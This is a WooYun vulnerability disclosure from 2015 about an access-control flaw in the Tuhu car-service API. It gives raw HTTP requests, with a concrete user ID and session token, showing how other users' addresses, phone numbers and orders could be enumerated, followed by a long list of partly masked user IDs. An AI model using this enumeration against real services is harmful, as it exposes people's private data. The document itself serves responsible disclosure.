乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-22: 细节已通知厂商并且等待厂商处理中 2015-05-22: 厂商已经确认,细节仅向厂商公开 2015-06-01: 细节向核心白帽子及相关领域专家公开 2015-06-11: 细节向普通白帽子公开 2015-06-21: 细节向实习白帽子公开 2015-07-06: 细节向公众公开
途虎养车网多出设计不当可遍历他人信息包括 收货地址、联系电话、订单信息等等等
漏洞的一个前提条件:用户id等都是gird,所以已通过其他漏洞获取了部分用户的userid。否则自动生成gird的userid,匹配率会很低。其他漏洞可以获取的userid,但是没有用户的信息。简单的一个漏洞或许没有什么太大的危害,但是通过多个信息的搜集,综合利用,或许会有不错的效果。001、任意登录某用户,查看收货地址。利用burp,对【】中的数据进行遍历
GET /Addresses/SelectAddresses?userId=%7B【d8b34bee-40fb-45fc-8791-98261df80932】%7D HTTP/1.1Host: api.tuhu.cnConnection: Keep-AliveAccept-Encoding: gzipusersession: 1900FC6D21DB409CEA83F3BD4E0F2FF2
002、由搜集到的数据,开始遍历查看提供部分测试数据,用于复现(建议审核验证后删除或者打码)
*****b5-c6ea-d22b**********f-1d9e-dc**********1-4023-3a**********a-58c7-c1**********b-b75f-db**********5-ab5d-76**********1-3ac9-9d**********0-bce8-d8**********e-7db8-31**********2-67ac-b6**********0-681c-43**********b-b828-83**********2-ffa0-5d**********0-bce8-d8**********0-bce8-d8**********2-45d9-19**********f-975a-e7**********a-8bd2-d7**********b-a424-06**********f-25ad-51**********b-2d8d-35**********b-25a3-44**********2-a72e-7e**********3-ec7b-84**********9-ee7b-53**********7-b76c-0b**********4-0a3d-f8**********9-cb9a-01**********9-ee7b-53**********8-e2c2-4e**********f-925c-7e**********b-bc1f-f0**********9-f84e-1a**********3-3141-b0**********c-4ec4-7a**********f-77f6-7b**********9-5d40-14**********3-1032-df**********6-adca-95**********c-c262-7a**********9-9cea-eb**********0-2a3c-0d**********b-39ac-df**********5-cfb5-7b**********4-3c90-1d**********c-95d0-43**********5-b72a-ac**********c-292b-5b**********2-ec85-64**********e-61eb-6b**********2-2778-7e**********d-0331-fc**********7-9eb7-88**********d-6d35-f4**********7-42c5-c4**********a-b8b5-0f**********0-b099-84**********6-aaf1-4c**********5-48b3-8e**********b-c35a-99**********7-dd20-56**********c-7abd-07**********4-c9fb-fb**********c-b73e-88**********7-4fc4-a3**********c-b010-26**********7-b5ba-99**********4-a39d-68**********6-9017-72**********6-d905-ec**********1-8582-8c**********1-bac6-72**********d-e53a-4c**********6-de3b-a3**********a-5b3e-a9**********5-3f36-74**********6-8f9d-bd**********d-e494-06**********4-1252-59**********5-788b-43**********8-2673-6a**********f-dc72-5f**********5-788b-43**********2-f72a-9d**********7-b9f1-79**********d-2fae-05**********4-b72e-3c**********9-63dd-42**********7-f5d4-cf**********b-ad65-6a**********d-a6d1-ec**********a-a91a-14**********5-288a-05**********c-3acf-26**********d-041c-58**********9-5afa-68**********7-1267-b3**********c-8e49-4e**********f-8a65-a2**********3-3141-b0**********7-4d2c-bd**********f-93b4-7a**********a-1c9b-87**********7-6cb6-9a**********d-1be7-c8**********0-613c-22**********d-bb1e-99**********4-6b21-a1**********8-2bd5-9a**********c-a093-88**********e-9069-6e**********8-a26c-59**********9-bea5-b0**********6-04c4-52**********5-b2b7-5c**********5-b2b7-5c**********2-ad00-df**********b-3216-46**********9-9590-d9**********a-5d8f-61**********d-1981-43**********a-cc4b-ef**********9-474b-42**********f-64f0-70**********8-c05c-58**********7-cbb1-e6**********1-8b28-bf**********d-e754-a5**********0-8fb1-04**********3-d94f-6f**********9-42c3-22**********5-f2ea-32**********8-8962-c8**********d-5946-a8**********e-1b2c-06**********3-49fa-2f**********5-a97c-86**********2-c64e-c7**********3-8206-87**********f-3a91-06**********7-c91e-f6**********1-6ddd-ba**********0-e70b-c4**********1-8740-88**********b-9e4f-a7**********c-87f1-32**********b-2d8d-35**********5-69c6-6f**********d-7b35-87**********c-b89c-9b**********5-e964-d4**********7-0836-52**********d-863f-ff**********2-ed46-ea**********5-09da-b3**********3-8dac-21**********b-e480-b6**********d-a924-f1**********b-c2f7-d9**********7-1065-8a**********3-b11a-bc**********6-5df6-d6**********d-0d1e-4e**********e-3573-65**********4-90d2-c7**********c-617d-53**********8-b72f-23**********0-550c-91**********7-e175-f0**********d-5070-b7**********0-550c-91**********7-f2a8-4b**********0-550c-91**********a-81ea-1d**********6-52ce-f0**********a-9c73-73**********7-25f7-24**********0-550c-91**********e-bf76-03**********6-c001-d9**********4-5957-75**********9-d43a-e9**********f-b1a2-0d**********f-dc5e-f5**********e-0bcc-8c**********2-5ed3-ae**********6-3784-b3**********5-a290-08**********e-2b45-02**********5-bad3-f3**********1-9a9e-24**********6-8ddd-78**********2-babf-8e**********5-bbb9-43**********9-76ef-8f**********6-9017-72**********8-4610-7b**********4-12ef-6f**********7-b1e1-f0**********c-890e-1f**********8-4a20-86**********7-b1e1-f0**********f-8ed4-9d**********c-2bbe-3d**********c-2bbe-3d**********9-d43a-e9**********0-5b04-5f**********4-2f1c-f1**********e-5a74-70**********4-ba60-68**********4-ba60-68**********8-8da5-25**********c-7e4d-51**********b-634e-b3**********5-061a-c3**********3-37d7-30**********0-4364-5d**********c-6d3c-1e**********a-9aab-22**********c-e4d8-82**********6-329c-38**********5-869e-ae**********8-8c43-e5**********d-5b28-f5**********d-1698-8b**********8-eed5-8b**********0-9c80-d6**********1-afe8-ea**********5-061a-c3**********d-1698-8b**********2-03bb-f7**********8-8bed-05**********8-3cec-80**********8-4906-04**********d-1698-8b**********6-8782-c2**********4-24a5-4e**********5-09da-b3**********f-bf85-b4**********d-1698-8b**********0-b9bf-f6**********f-acbe-0d**********7-945a-c2**********8-429a-1e**********c-f364-24**********b-e3d9-bd**********5-7d90-e9**********1-a16e-ae**********b-a9a5-ff**********b-e656-23**********4-ae2d-64**********5-7d90-e9**********8-abe2-f1**********2-7539-55**********4-f122-72**********1-5c3c-97**********9-ebbe-39**********2-babf-8e**********b-e3d9-bd**********5-823b-50**********3-9c41-56**********9-ef79-10**********e-9ae2-5d**********b-9890-3d**********6-8ef2-94**********5-46c0-b9**********1-4738-25**********1-9a9e-24**********5-f3f5-09**********c-2594-4d**********d-3397-54**********2-832e-bf**********4-2848-b9**********8-a671-3a**********3-ff0b-a7**********4-ee39-74**********7-ca4c-83**********8-a671-3a**********8-db3b-cb**********4-9fb7-bd**********8-dc2d-32**********5-8177-bb**********e-14c1-8d**********1-88f2-03**********a-a91a-14**********d-83ad-3e**********7-bff5-82**********6-e0d3-cf**********4-68b4-c5**********1-4949-78**********3-c655-f3**********4-e8fb-08**********5-4177-ec**********c-5b6c-0f**********8-8d55-f2**********8-2773-0c**********f-3c4b-6d**********6-6f5a-d1**********9-c348-37**********c-fceb-70**********1-99a0-9b**********8-78f8-33**********c-32d5-39**********e-05c2-4c**********2-731b-e0**********9-3b61-22**********4-b4f7-48**********8-a69a-f8**********c-3d83-f7**********4-b4f7-48**********7-900c-f9**********1-5c3c-97**********5-8359-e4**********f-a61e-fb**********8-a2a8-e5**********d-a564-e8**********f-8a91-8e**********7-2227-71**********e-c9dc-4c**********6-08f5-c7**********2-f26e-2f**********d-c6fe-4a**********c-cdff-27**********2-c747-d7**********c-def7-fd**********7-3aba-1a**********7-d0c2-ca**********5-d13f-81**********f-86d5-bb**********3-1d72-32**********b-b6f4-ef**********8-a276-9e**********2-cbed-15**********4-11c1-71**********0-6627-bb**********4-a6b5-07**********8-8822-79**********2-8ea8-dd**********7-9a87-e6**********4-94d1-c5**********0-89bb-d8**********2-a96b-26**********2-6260-29**********2-48ba-3e**********a-a4d2-45**********5-a96c-f7**********4-bd2e-a0**********d-a68b-94**********2-7601-a2**********0-1597-6d**********2-8b21-08**********2-993e-0f**********a-c102-be**********3-1277-d5**********0-02a7-cc**********b-bfa1-62**********1-83cb-70**********3-9be4-5b**********1-26b4-82**********0-870c-bb**********f-47dc-89**********1-2c98-19**********8-8aef-64**********a-7bd5-f2**********e-b3a9-45**********0-9d39-15**********0-ab69-20**********5-a443-18**********e-817a-7c**********9-8812-25**********4-a0f9-7c**********e-8c83-b4**********6-b2cc-08**********9-8256-31**********e-7ade-fa**********e-a405-00**********2-27ee-f7**********c-9f41-55**********f-49b3-f5**********5-cb31-7d**********3-3a6c-54**********b-ef47-93**********f-3099-c5**********2-d1ac-4a**********7-cef6-ad**********5-3c1f-b1**********f-799a-f7**********0-77bd-57**********6-b2cc-08**********1-e5f0-76**********0-e218-94**********a-f5fe-c4**********6-b2cc-08**********8-776b-1c**********9-ee84-0d**********6-b2cc-08**********6-b2cc-08**********e-56fd-d4**********8-ca61-b0**********3-14d3-52**********a-ba89-f3**********6-8e38-b1**********9-ee19-57**********e-3bad-ba**********2-8898-35**********d-acd1-7f**********1-293d-56**********b-c1ae-ee**********b-3012-f7**********4-ebd2-1d**********5-c4fe-51**********8-a2ab-85**********0-7b9c-8e**********2-3ef0-61**********5-abfc-d9**********8-daef-ac**********2-1036-25**********8-daef-ac**********a-9f1f-43**********e-a405-00**********6-b1e9-d5**********8-c86d-79**********5-abfc-d9**********c-fd08-cc**********8-97bf-a4**********4-8011-d6**********3-12e7-03**********8-7759-2b**********5-845a-db**********6-976b-e6**********6-872d-6c**********9-8987-22**********8-1c9e-fa**********2-b16a-f8**********e-9012-5f**********f-cbd9-e3**********9-d1aa-fc**********b-68c4-40**********9-4e68-41**********2-4591-54**********c-fe54-0f**********6-4b4f-43**********d-44bf-c8**********6-9466-00**********d-44bf-c8**********d-44bf-c8**********d-44bf-c8**********5-3fef-6c**********b-cb09-04**********7-cd28-7e**********5-847f-8d**********3-dd23-a6**********a-a98c-10**********c-5b48-37**********7-02ee-99**********8-980f-3f**********b-510c-74**********7-53d3-5b**********8-886b-04**********b-e4aa-98**********6-eb77-39**********1-e546-3f**********e-8123-91**********9-69ec-5e**********6-d9b5-fc**********f-27f1-7b**********d-9cae-1b**********4-44b4-16**********0-86c1-f9**********3-8c28-9e**********6-77c5-64**********6-9014-6d**********7-88c1-e7**********6-b058-be**********d-ef77-90**********9-79d4-d5**********8-ff81-84**********1-04da-1c**********6-332b-03**********7-4ee7-b1**********a-3a49-e6**********7-06dd-40**********e-772f-f7**********0-c370-bc**********b-1c24-c6**********0-bd51-d6**********c-0ea8-4a**********f-7d2a-ac**********a-17b2-ac**********0-bd51-d6**********6-1594-05**********5-32ad-57**********b-e7c6-68**********4-bed5-0c**********8-e2bf-45**********f-a518-d6**********7-6ea8-b5**********8-9946-b1**********c-74ae-45**********5-85d3-39**********3-b44c-47**********3-14d8-f9**********d-0289-31**********e-1848-37**********6-0762-ce**********c-e922-5b**********-b0ec1c0218d*****
GET /Order/SelectPromotionCodeByType?pindex=1&userid=%7Bd8b34bee-40fb-45fc-8791-98261df80932%7D&type=0 HTTP/1.1Host: api.tuhu.cnConnection: Keep-AliveAccept-Encoding: gzipusersession: 1900FC6D21DB409CEA83F3BD4E0F2FF2
POST /Order/SelectOrders HTTP/1.1Content-Length: 62Content-Type: application/x-www-form-urlencodedHost: api.tuhu.cnConnection: Keep-AliveAccept-Encoding: gzipusersession: 1900FC6D21DB409CEA83F3BD4E0F2FF2pageIndex=1&userid=d8b34bee-40fb-45fc-8791-98261df80932&type=7
你们更专业
危害等级:高
漏洞Rank:15
确认时间:2015-05-22 15:23
漏洞证实,技术人员会处理。
暂无